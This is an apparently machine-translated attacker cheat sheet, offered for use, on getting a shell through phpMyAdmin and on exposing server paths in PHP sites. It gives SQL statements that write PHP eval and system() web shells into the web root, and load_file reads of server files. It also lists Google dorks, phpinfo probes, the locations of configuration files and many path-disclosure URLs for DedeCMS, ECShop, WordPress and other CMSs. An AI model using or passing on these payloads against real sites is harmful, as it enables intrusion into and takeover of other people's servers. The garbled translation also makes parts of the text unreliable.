Phpadmin Backstage Get Shell

Method One:
CREATE TABLE ' mysql '. ' Xiaoma ' (' xiaoma1 ' TEXT not NULL);
INSERT into ' MySQL ', ' xiaoma ' (' xiaoma1 ') VALUES (' <?php @eval ($_post[xiaoma])?> ');
SELECT xiaomafrom study into OUTFILE ' e:/wamp/www/7.php ';
----above at the same time, in the database: MySQL create a table named: Xiaoma, Field xiaoma1, export to e:/wamp/www/7.php
A word connection password: Xiaoma

Method Two:
Create TABLE Xiaoma (xiaoma1 text not NULL);
Insert into Xiaoma (XIAOMA1) VALUES (' <?php eval ($_post[xiaoma])?> ');
Select Xiaoma1 from Xiaoma to outfile ' e:/wamp/www/7.php ';
Drop TABLE IF EXISTS xiaoma;

Method Three:

Read file contents: Select Load_file (' e:/xamp/www/s.php ');

Write a word: select ' <?php @eval ($_post[cmd])?> ' into OUTFILE ' e:/xamp/www/xiaoma.php '

CMD execution permissions: select ' <?php echo \ ' <pre>\ '; system ($_get[\ ' cmd\ '); echo \ ' </pre>\ ';?> ' into OUTFILE ' e:/xamp/www/xiaoma.php '


Method Four:
Select Load_file (' e:/xamp/www/xiaoma.php ');

Select ' <?php echo \ ' <pre>\ '; system ($_get[\ ' cmd\ '); echo \ ' </pre>\ ';?> ' into OUTFILE ' e:/xamp/www/xiaoma.php '
Then visit the Site Directory: Http://www.xxxx.com/xiaoma.php?cmd=dir





PHP Explode Path Method collection:




1. Single-Quote Burst path
Description
Add single quotation marks directly after the URL, requiring that the single quotation mark is not filtered (Gpc=off) and the server returns an error message by default.
www.xxx.com/news.php?id=149′

2, error parameter value explosion path
Description
Change the value of the parameter to be submitted to an error value, such as-1. -99999 single quotes are filtered when you may try.
Www.xxx.com/researcharchive.php?id=-1

3. Google explode path
Description
Combined with the keyword and site syntax to search the page snapshot of the error page, common keywords have warning and fatal error. Note that if the target site is a level two domain name, site is connected to its top-level domain name, so that it gets much more information.
SITE:XXX.EDU.TW Warning
Site:xxx.com.tw "Fatal error"

4. test file explosion path
Description
There are test files in the root directory of many Web sites, and the script code is usually phpinfo ().
www.xxx.com/test.php
www.xxx.com/ceshi.php
www.xxx.com/info.php
www.xxx.com/phpinfo.php
www.xxx.com/php_info.php
www.xxx.com/1.php

5, phpMyAdmin explosion path
Description
Once you find the admin page for phpMyAdmin and then access some of the specific files in that directory, you are likely to burst the physical path. As for the phpMyAdmin address can be used wwwscan such tools to sweep, you can also choose Google. PS: Some BT websites will be written as phpMyAdmin.
1./phpmyadmin/libraries/lect_lang.lib.php
2./phpmyadmin/index.php?lang[]=1
3./phpmyadmin/phpinfo.php
4. Load_file ()
5./phpmyadmin/themes/darkblue_orange/layout.inc.php
6./phpmyadmin/libraries/select_lang.lib.php
7./phpmyadmin/libraries/lect_lang.lib.php
8./phpmyadmin/libraries/mcrypt.lib.php

6. configuration file Find path
Description
If the injection point has file Read permissions, you can manually load_file or tool to read the configuration file, and then look for path information (typically at the end of the file). Web server and PHP configuration file default path under each platform can be checked online, here are a few common.

Windows:
C:\windows\php.ini PHP configuration file
C:\windows\system32\inetsrv\MetaBase.xml IIS Virtual Host configuration file

Linux:
/etc/php.ini PHP configuration file
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf Apache configuration file
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-vhosts.conf Virtual Directory configuration file

7, Nginx file type Error resolution explosion path
Description
This is the method that was inadvertently discovered yesterday, of course, requires the Web server is Nginx, and there is a file type parsing vulnerability. Sometimes add/x.php after the picture address, the picture will not only be executed as PHP file, but also may burst the physical path.
www.xxx.com/top.jpg/x.php

8. Other
Dedecms
/member/templets/menulit.php
plus/paycenter/alipay/return_url.php
plus/paycenter/cbpayment/autoreceive.php
paycenter/nps/config_pay_nps.php
plus/task/dede-maketimehtml.php
plus/task/dede-optimize-table.php
plus/task/dede-upcache.php

Wp
wp-admin/includes/file.php
wp-content/themes/baiaogu-seo/footer.php

Ecshop Mall System Burst Path Vulnerability file
/api/cron.php
/wap/goods.php
/temp/compiled/ur_here.lbi.php
/temp/compiled/pages.lbi.php
/temp/compiled/user_transaction.dwt.php
/temp/compiled/history.lbi.php
/temp/compiled/page_footer.lbi.php
/temp/compiled/goods.dwt.php
/temp/compiled/user_clips.dwt.php
/temp/compiled/goods_article.lbi.php
/temp/compiled/comments_list.lbi.php
/temp/compiled/recommend_promotion.lbi.php
/temp/compiled/search.dwt.php
/temp/compiled/category_tree.lbi.php
/temp/compiled/user_passport.dwt.php
/temp/compiled/promotion_info.lbi.php
/temp/compiled/user_menu.lbi.php
/temp/compiled/message.dwt.php
/temp/compiled/admin/pagefooter.htm.php
/temp/compiled/admin/page.htm.php
/temp/compiled/admin/start.htm.php
/temp/compiled/admin/goods_search.htm.php
/temp/compiled/admin/index.htm.php
/temp/compiled/admin/order_list.htm.php
/temp/compiled/admin/menu.htm.php
/temp/compiled/admin/login.htm.php
/temp/compiled/admin/message.htm.php
/temp/compiled/admin/goods_list.htm.php
/temp/compiled/admin/pageheader.htm.php
/temp/compiled/admin/top.htm.php
/temp/compiled/top10.lbi.php
/temp/compiled/member_info.lbi.php
/temp/compiled/bought_goods.lbi.php
/temp/compiled/goods_related.lbi.php
/temp/compiled/page_header.lbi.php
/temp/compiled/goods_script.html.php
/temp/compiled/index.dwt.php
/temp/compiled/goods_fittings.lbi.php
/temp/compiled/myship.dwt.php
/temp/compiled/brands.lbi.php
/temp/compiled/help.lbi.php
/temp/compiled/goods_gallery.lbi.php
/temp/compiled/comments.lbi.php
/temp/compiled/myship.lbi.php
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/includes/modules/cron/auto_manage.php
/includes/modules/cron/ipdel.php

Ucenter Blast Path
ucenter\control\admin\db.php

Dzbbs
Manyou/admincp.php?my_suffix=%0a%0dtoby57

Z-blog
admin/fckeditor/editor/dialog/fck%5fspellerpages/spellerpages/server%2dscripts/spellchecker.php

php168 Blast Path
Admin/inc/hack/count.php?job=list
Admin/inc/hack/search.php?job=getcode
Admin/inc/ajax/bencandy.php?job=do
Cache/mysqltime.txt

Phpcms2008-sp4
Registered user Access after login
Phpcms/corpandresize/process.php?pic=. /images/logo.gif

Bo-blog
Poc:
/go.php/<[evil Code]
Cmseasy website Path Vulnerability
The vulnerability appears in the menu_top.php file
lib/mods/celive/menu_top.php
/lib/default/ballot_act.php
lib/default/special_act.php

Phpadmin Backstage Get Shell